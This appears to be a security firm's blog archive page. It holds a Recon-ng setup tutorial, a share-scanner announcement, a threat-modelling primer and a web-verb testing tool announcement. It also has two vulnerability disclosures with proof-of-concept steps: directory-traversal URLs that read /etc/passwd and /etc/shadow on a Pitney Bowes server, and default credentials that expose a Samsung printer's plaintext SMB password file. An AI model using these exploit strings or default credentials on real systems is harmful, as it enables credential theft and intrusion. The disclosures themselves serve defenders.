Archives

All posts by SNM

Intro

Recon-ng is a Open Source Reconnaissance framework written in Python.  This SQLite database driven tool incorporates Python modules and API Keys to allows itself to be a conduit for many tools ranging from The Harvester to Metasploit.  It is an awesome standalone reconnaissance tool in its own right. As a side note we all totally have a geeky nerd crush on LaNMaSterR53.

This part of the series will take a look at installation, adding API Keys. Later we will show you how to create a Workspace, importing data into the database, and export data for the use with other tools.

For our targets of reconnaissance, we will use HackerOne’s directory of companies.  This is not our way of saying, “Go out and hack these companies” but our way of doing safe recon and provide continuous screenshots.  That will be easy to follow.  This is also our way of introducing you to HackerOne and the Bug Bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next clone Recon-ng from bitbucket (Figure 1). In this tutorial we clone to the Home directory but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
git install

Figure 1: git install

Next, change directory into the newly created recon-ng and list the contents (Figure 2).

cd recon-ng
ls
recon-ng contents

Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use, we will go over a little bit of information now while you’re still paying attention and then get recon-ng running and the API keys loaded.

The installation of recon-ng also created a .recon-ng a hidden directory inside your home directory.  This directory is empty.  This is where your key.db and your workspaces will be created. After logging into recon-ng for the first time, a directory and the keys.db is entered in the hidden .recon-ng directory (Figure 3).

.recon-ng directory

Figure 3: .recon-ng directory

To run recon-ng, go to the folder where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set error” (Figure 4).  We have not added any API keys yet.

Initial Start

Figure 4: Initial Start

From our screen, we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules.  We are also using the “default” workspace. (Figure 5)

Recon-ng start screen

Figure 5: Recon-ng start screen

Close recon-ng and lets look at the modules and the underlying code. (Figure 6)

cd modules
cd recon
ls
Module Directory

Figure 6: Module Directory

If we go inside the module directory and inside a module, we can see the Python script that does all the magic. (Figure 7)

Module Content

Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database driven tool.  Now it’s time to add information into the database.

The API keys are used by the modules to gather information for the SQLite database.  Some of the API keys are free but some can be expensive.  I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console. (Figure 8)

keys list
Keys List

Figure 8: Keys List

The following command is an example of adding the shodan_api key. (Bottom of Figure 8, Look close it is there)

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time consuming part of the setup. Showing each signup would be lethally boring so here are the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instragram API – https://www.programmableweb.com/api/instagram
Linkedin API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/


Part 2: Workspaces and Importing Data

This PowerShell script, written by our friend Rafael Montoya, will allow you to scan open shares based on a list you provide or a subnet you enter. It will process hostnames or IP addresses and attempt to connect to the shares on a machine using WMI to make the connection.

Using PowerShell it will call the Get-WMIObject with the Class of Win32_ConnectionShare and it can be modified to allow more properties that can be listed. The current properties that are listed are PSComputerName, Name, Path and Description.

For use with subnets and cidr notation the GET-IPRange will currently list out the IP addresses in the subnet that was entered. For a /24 it will list out all 254 usable addresses and scan those IPs for a SMB share.

The framework is basically a simple interface to interact with both of these functions; it will ask you to provide a CIDR or file and depending on which one you pick it will run the proper command to get the shares. The script will output the results into a separate file that you have to specify and it will append and only write shares that it finds.

All the code you need is here: GitHub

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and twitter we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb

About a year ago during a network penetration test I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester but luckily the connection was slow enough that I watched the page load briefly then redirect to the next page. This definitely highlights the importance of manually testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago and I didn’t want to publish any vulnerability information irresponsibly.  The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version :  2.01.00.26
Network Firmware Version :  V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version :  1.20.73
UI Firmware Version :  V1.03.01.55 07-13-2009
Finisher Firmware Version :  Not Installed
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
PCL6 Firmware Version : PCL6 5.86 10-28-2008
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
SPL Firmware Version : SPL 5.32 01-03-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Samsung SCX-5635 Series
Main Firmware Version :     2.01.01.18 12-08-2009
Network Firmware Version :     V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version :     1.31.32
PCL5E Firmware Version :    PCL5e 5.92 02-12-2009
PCL6 Firmware Version :    PCL6 5.93 03-21-2009
PostScript Firmware Version :    PS3 1.94.06 12-22-2008
TIFF Firmware Version :    TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file access     http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.

Now that you’ve identified what you have to protect, the next step is to figure out who you are protecting it from. This concept is much easier to understand. Almost all actors fall into two broad categories: internal and external actors.

Internal actors are employees, contractors, and third parties with access to your assets. Third parties could be employees of your cloud provider or the company that processes benefits and payroll.

Internal threats can result from actors inadvertently using their privilege improperly, such as creating a misconfiguration or clicking a link in a phishing email. Internal actors can also purposefully act malicious  and knowingly create threats in the environment such as stealing data or installing malicious software.

  • Internal Actors
    • Employees
    • Contractors
    • Third Parties with access to assets
  • Internal Malicious Actors
    • Disgruntled Employees
    • Internal System Controlled by External Actor

Due to the inherent trust given to internal actors, the potential impact from these actors is higher than from external actors. While external actors make for better news stories and TV shows, it is imperative to review and mitigate threats from internal actors.

There are a number of different types of external actors, each with different motivations and goals.

  • External Malicious Actors
    • Hackers
    • Crackers
    • Hacktivists
    • Criminal Elements
    • Nation-States
    • Industrial Espionage

While the term Hacker has become synonymous with any individual with nefarious motives, the term is usually used for a curious, technically savvy individual who gains unauthorized privileges to a system without malicious intent.

On the other hand, Crackers are individuals with malicious intent who intentionally try to bypass security controls.

With the movement of activities online, normal protesters morphed into Hacktivists. Hacktivists target an organization with a political or social motive. While hackers or crackers choose targets of opportunity or with a financial motive, Hacktivists target a sector or organization for ideological reasons. Due to that ideological focus, it is possible that hacktivists will expend more time and effort on a target.

Criminal elements are attempting to monetize the assets of an organization. This is a fancy way of saying they will sell credit card numbers, personal information, or run bitcoin miners on computers. Ransomware, which encrypts user data and requires a ransom to access the encrypted files, is a common way to extort organizations for money.

Nation-States are highly funded and operate on extended time frames, usually in the terms of years. Nation-states are incredibly difficult to defend against due to the additional levels expertise they can bring to bear. If you are in an industry commonly targeted by a nation-state (such as Defense or Aerospace), focusing on breach detection and having a close relationship with law enforcement is paramount.

Industrial espionage is a catch-all term for any of the above individuals focusing on stealing trade secrets or sensitive organization data. Nation-states may engage in industrial espionage to give their companies a competitive edge. Criminal elements may target an organization to sell any information obtained during a breach or sell information found during an untargeted breach. Hacktivists will expose data found to further their ideological cause.

Now that you’ve determined who are the most likely actors in your threat model and also determined which would cause the largest potential impact, you can create a list of threats to focus on.

 

A quick example would be a coal company operating a mine.

 

Asset                                Actor                                                 Threat              Mitigation


External Website             Hacktivists/Hackers/Crackers        Defacement       Quarterly Web Application Scans

Personnel HR Data          Employees/Third Party                   Data Theft           Access Control Policies

Internal Network             Criminal Elements                            Phishing               Phishing Awareness Training

 

Obviously, this list would be very long for any organization, but at some point, many of the mitigation elements will overlap. This means that in the previous example, the Access Control Policies that protect HR Personnel Data from Data Theft also protect it from access if a criminal element gains unauthorized access to the network. The best mitigation items will protect multiple assets from a variety of actors and eliminate most risk.

Where to Start

The simplest threat model is something (Asset) being manipulated by someone or something (Actor), resulting in a threat.

 

Threat Model Overview

Threat Model Overview

This post deals with the first part of the equation.

 

Threat Model Asset

Threat Model Asset

What are you protecting? Computer systems are relatively expensive to purchase. A server and attached disks that cost five thousand dollars to purchase new can easily store millions of dollars worth of data. Prior to engaging any company for a security assessment, it is imperative to understand exactly what needs to be protected and why.

Data and Data Flow

What is your company’s secret sauce? If you are protecting design documents for a widget, there is a chain of systems that all require protection. The storage system needs to be protected from unauthorized access. The end user system that is used to modify the documents require that same level of protection. Also, the entire network that transmits documents needs to be protected. This also needs to be done within a fixed budget and not affect the ability of the company to make money. While Secure Network Management makes money securing networks, most companies do not.

Hardware

Why would someone want to compromise a computer? Data is valuable, but computers and networks can also be monetized. Bitcoin mining reduces the computing power available for legitimate activities and increases electricity usage. Spam malware uses computing power, network bandwidth, and has the potential for a legitimate business to be blacklisted by SMTP servers.

Now What

Know what your network is. While this sounds easy enough, it is normally one of the limiting factors. That is easy right? You use that one 10.10.10.0/24 network for all your computers and servers. Done! Well…except each wireless access point uses a 192.168.1.0/24 network and the LAN-to-LAN tunnel into the Cloud providers network using that 10.10.11.0/28 network. And that one guy who brought a wireless router in from home so he could watch movies on his iPad during work…I wish I had made that last one up.  Better update all the spreadsheets! Security assessments are garbage in/garbage out; the assessors will only test what is in the scope you provide or authorize. If you do not know or don’t have the technical expertise to determine all of the networks in use, any reputable security or IT support company can review the network fabric. This review should not be a long or costly engagement.

Most people underestimate the number of devices on their network by at least 30%. Everything with a network cable is a potential target. Server and computer counts are normally pretty accurate. Printers, scanners, and peripherals are normally underestimated, if included at all. Network devices, beyond the core switch and router, normally do not show up on device spreadsheets. Obtaining a fairly accurate count of devices using a simple network scanner is also easily performed by a competent systems administrator, security, or IT support company.

You are now a few days into getting an asset list in order. This is a solid investment with or without an assessment. You cannot protect what you don’t know about.


End of Step 1: What you know – The networks and devices in use and data that is stored, processed, and transmitted on the network.

There are a few things that I didn’t care for about hosting code on our website. Not being able to directly upload and download python code as a .py file was a real pain.

I use GitHub to download other great projects for penetration testing and decided to see how complicated it was to setup. It was super easy, there was even a HELLO WORLD tutorial.

All of the code will continue to be hosted on this page but new projects will contain a link to the GitHub repository.

Secure Network Management on GitHub

Have you ever manually tested the Glassfish Authentication Bypass (CVE Details)? What about manually testing it on 40+ servers while dealing with indecisive people patching systems on the fly? I had that wonderful opportunity while running tests for a federal agency.

After all the headache and bureaucracy, I wrote a quick python program just to test for that specific case of verb tampering.

Time passed…and I switched jobs. During the interim, I spent a lot of time thinking about web verbs and what I could use them for as a penetration tester. Web verb tampering is on OWASP’s list but doesn’t seem to get the same amount of attention that the different types of injections command.

What this lead to was Verbinator. Verbinator tests web verbs and cases. Lots of web verbs. I found all of the RFC specified verbs plus some others used mostly by Microsoft. All of the RFC numbers and verbs are in the source if you’re interested. As a bonus, you can also cram some random text in for the verb because web servers absolutely LOVE unexpected input. While reading return data is barrels of fun, I also added a differential ability to show if the response changed when the web verb case was altered.

If you have any questions, comments, or ideas for improving the program, please let me know.

This is a direct collaboration with Doofenshmirtz Evil Incorporated all work is subject to platypus attack.

**********
Source just rename it to .py verbinator
Basic usage:
verbinator-use